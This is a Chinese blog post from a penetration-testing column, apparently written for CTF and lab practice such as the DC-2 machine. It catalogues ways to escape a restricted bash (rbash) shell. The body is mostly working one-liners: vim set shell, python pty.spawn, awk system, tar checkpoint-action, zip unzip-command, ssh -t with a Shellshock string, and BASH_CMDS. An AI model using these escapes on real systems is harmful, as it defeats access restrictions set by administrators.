【渗透测试】--- rbash逃逸方法简述

已于 2022-07-28 08:08:30 修改
阅读量4.2k 收藏 59
点赞数 10
分类专栏: 渗透测试 文章标签: 网络安全 渗透测试
于 2020-12-29 10:01:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43168364/article/details/111830233
版权

一、rbash简述

1.什么是rbash

  • 它与一般shell的区别在于会限制一些行为,让一些命令无法执行

2.如何设置一个rbash

cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash
useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash
mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令

二、枚举Linux环境(为逃逸做信息收集)

1.检查可用的命令

  • 如 cd、ls、su 等

2.检查可用的操作符

>   >>   <   |

3.root身份可以运行的命令

sudo -l # sudo应该也会被禁用

4.检查shell

echo $SHELL	 # 基本都是/bin/rbash

5.检查可用的编程语言

python  perl  ruby 等

6.检查环境变量
执行:env/printenv

三、常见的逃逸技术

1.“/”字符被允许了

  • 如果/被允许我们可以直接运行:/bin/bash

2.cp命令被允许

  • 可以直接复制/bin/bash到本地用户目录
cp /bin/bash test1
cp /bin/sh test2
./test1 # 切换到了/bin/bash
./test2 # 切换到了/bin/sh

3.常见应用
探测系统中是否存在常见应用

  • FTP,GDB(调试程序的工具)等。
    • 执行:ftp > !/bin/sh
    • 执行:gdb > !/bin/sh
  • man/git
    • 执行:man > !/bin/sh
    • 执行:git > git help status
  • vi/vim
> vim test
:!/bin/sh # 利用在vi/vim中可以执行命令的特点
  • more/less
> more test
!/bin/sh # 同样也是利用打开文件后可以在下面运行命令的特点

4、set shell(DC-2靶机使用它成功了)

  • 在一些编辑器中可以设置shell变量然后执行,如vim中
# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
:shell

# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

5.更改PATH或SHELL环境变量

  • 执行:export -p # 查看系统的环境变量设置
  • PATH 和 SHELL 变量的权限设置很可能是:“-rx” ,这就意味着我们只能执行和读取,不能写入。如果有w权限的话,我们可以直接给它写入/bin/bash
    在这里插入图片描述

6.编程语言

  • 语言可以帮助我们切换shell的类型
  • (1) python
python -c "import os;os.system('/bin/bash')"
或者
python -c "import pty;pty.spawn('/bin/bash')"
  • (2) php
php -a then exec("sh -i")
  • (3) perl
perl -e "exec '/bin/sh';"
  • (4) lua
os.execute('/bin/sh')
  • (5) ruby
exec "/bin/sh"

7.其他可以尝试的方法

  • ssh
ssh username@IP -t "/bin/sh" or "/bin/bash"
  • ssh2
ssh username@IP -t "bash --noprofile"
  • ssh3
ssh username@IP -t "() { :; }; /bin/bash" (sehllshock)
  • ssh4
ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
  • zip
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
  • tar
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
  • awk(超级玛丽靶机使用它成功了)
awk 'BEGIN {system("/bin/bash")}'

8、另类方法(DC-2靶机使用它成功了)

  • 在命令行依次执行如下所示的命令
# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a 

# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
通地塔
关注
  • 10
    点赞
  • 59
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
HCIA-Security V4.0 教学大纲
12-27
6. **虚拟化与云安全**:探讨虚拟化环境中的安全问题,如虚拟机逃逸、资源隔离等。同时,介绍云计算安全服务,如VPC(虚拟私有云)、IAM(身份与访问管理)和云防火墙。 7. **数据加密与隐私保护**:讲解对称加密、...
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
3. **沙箱逃逸策略**:详细介绍了攻击者如何突破沙箱限制,可能涉及到权限提升、注入恶意DLL、篡改注册表项或者利用系统服务等方法。 4. **复现步骤**:提供了在受控环境中复现漏洞利用过程的详细指南,这有助于...
rbash绕过及提权
qq_45654333的博客
09-18 378
1,复制一个bash,重命名为rbash2,设置用户tom登陆的shell为rbash3, 在tom用户下新建一个.bin目录存放可以执行的命令4, 通过软连接执行命令5, 编辑文件/home/$tom/.bashrc,添加export PATH=$HOME/.bin/.文件一定要以# .bashrc为首行.
linux进行rbash逃逸方法
u013930899的博客
09-12 1138
rbash逃逸方法步骤
linux rbash逃逸介绍
有勇气的牛排博客
07-22 492
1 rbash介绍 rbash 与一般shell的区别在于会限制一些行为,让一些命令无法执行。 如何设置rbash cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令 2检查当前shell是否为rbash cd .. cd /home 输出:-
linux bash r,rbash限制的 bash
weixin_36213934的博客
05-16 517
rbash(restricted bash),即受限制的 bash,对于用作中转服务器,还是很不错滴。rbash 支持 debian 以及 rh。rbash 只是 bash 的一个软链接。除了这里提到的几个方面之外,它跟 bash 一样。* changing directories with cd* setting or unsetting the values of SHELL, PATH, E...
rbash环境变量提权
longwanlian的博客
01-19 461
实验环境——vulnhub-dc2靶场。可通过环境变量提权方式,越过此限制。lnhub-dc2靶场。
rbash绕过
weixin_43705814的博客
12-29 3279
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进行限制呢,有以下几个原因: 1.提高安全性,防止黑客和渗透测试人员的入侵 2.限制一些会对系统造成危害的危险命令 3.为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 二、常见的绕过方法 2.
行业资料-交通装置-一种汽车撞人防逃逸装置.zip
08-21
行业资料-交通装置-一种汽车撞人防逃逸装置.zip
唐青昊-真实场景下的虚拟逃逸.pdf
08-23
【唐青昊-真实场景下的虚拟逃逸】讨论的是云安全领域中的一个重要议题,即如何在真实的环境中防止虚拟机逃逸。虚拟逃逸是指攻击者通过利用虚拟化软件中的漏洞,从一个虚拟机中突破出来,对宿主机甚至整个云环境造成...
行业资料-交通装置-一种公交车逃逸窗.zip
08-25
行业资料-交通装置-一种公交车逃逸窗.zip
shell命令sh、dash、bash、rbash的区别
云袂的博客
05-06 1972
1、查看当前系统支持的shell类型 $ cat /etc/shells # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash 2、查看系统默认shell $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash 3、命令比对 $ ll /bin/sh lrwxrwxrwx 1 root root 4 3月 2 2016 /bin/sh -> d
linux限制用户可用命令,如何使用rbash限制用户访问Linux系统指定命令 互联网技术圈 互联网技术圈...
weixin_42371226的博客
04-29 1268
我的一位朋友问我如何允许用户只执行某些任务,并执行某些命令。用户不应更改环境变量/路径,不能访问除主目录以外的其他目录,不能切换到其他用户等。用户只能执行系统管理员分配的少量命令。那可能吗?是!这是Restricted Shell提供帮助的地方。使用Restricted Shell,我们可以轻松限制用户对Linux系统的访问。将用户置于受限shell模式后,只允许他们执行有限的命令集。在这个简短...
小H靶场学习笔记:DC-2
Hack_hui的博客
11-12 302
git提权 rbash逃逸
rbash
weixin_33997389的博客
05-01 281
如果启动rbash,以下操作将被禁止: 使用cd命令切换目录; 设置或者取消SHELL、PATH、ENV或者BASH_ENV环境变量; 以绝对路径运行命令; 使用绝对路径指定的文件名作为内置命令.的参数; 使用绝对路径指定的文件名作为内置命令hash的参数; 在启动时,从shell环境导入函数的定义; 在启动时,解析SHELLOPTS的值; 使用>、&g...
打靶指令经验集合(渗透上)
dashaziyihao的博客
11-22 1630
来来回回打了一些靶场,现在对靶场利用到的一些手段和语句进行一个记录。某些工具的参数大小写具有区分,所以使用的时候一定要查看说明。
【安全】Linux Restricted Shell 绕过指南
02-04 541
Linux Restricted Shell是一种限制命令、阻止环境变量,甚至于阻止管道/重定向的shell。常见的Linux Restricted Shell有rbash、rksh、rsh。 本文主要讨论,如何在安全测试中,进行rbash的绕过以及逃逸
权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互
最新发布
siu~
04-03 1449
1、普通用户到Linux-泄漏-History 2、普通用户到Linux-限制-Rbash绕过 3、普通用户到Linux-容器-LXD&Docker 4.Linux系统提权-web/普通用户-docker逃逸&提权&shell交互 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
靶场DC-2
weixin_50340347的博客
06-09 140
利用爬虫爬取网站,根据网站特点生成字典Cewl爬虫生成字典cewl - url 网址(如https : / / www . baidu . com) - w 文件名(如dict . txt)
CVE-2022-4492
07-27
回答: CVE-2022-4492是一个容器逃逸漏洞,也被称为LinuxCgroupContainerEscapeVulnerability。这个漏洞可以允许攻击者在容器内获得root权限,而无需获得CAP_SYS_ADMIN权限。\[2\]为了检测是否受到CVE-2022-4492的影响,您可以使用像Falco这样的运行时检测引擎工具。Falco是一个CNCF孵化项目,可以帮助检测云原生环境中的异常活动。通过使用Falco的规则,您可以检测到尝试利用Linux内核中的容器逃逸漏洞的行为。\[1\]如果您的容器已经投入生产,您可以部署一个图像扫描仪来进行检测。\[1\]另外,为了防止容器逃逸漏洞的利用,建议您采取一些安全措施,如禁用unshare、开启cgroup只读、关闭selinux等。\[2\] #### 引用[.reference_title] - *1* [CVE-2022-0492:权限提升漏洞导致容器逃逸](https://blog.csdn.net/u012516914/article/details/124223796)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[漏洞分析] CVE-2022-0492 容器逃逸漏洞分析](https://blog.csdn.net/Breeze_CAT/article/details/123427680)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [腾讯云服务器相关问题记录](https://blog.csdn.net/weixin_44633882/article/details/116277812)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值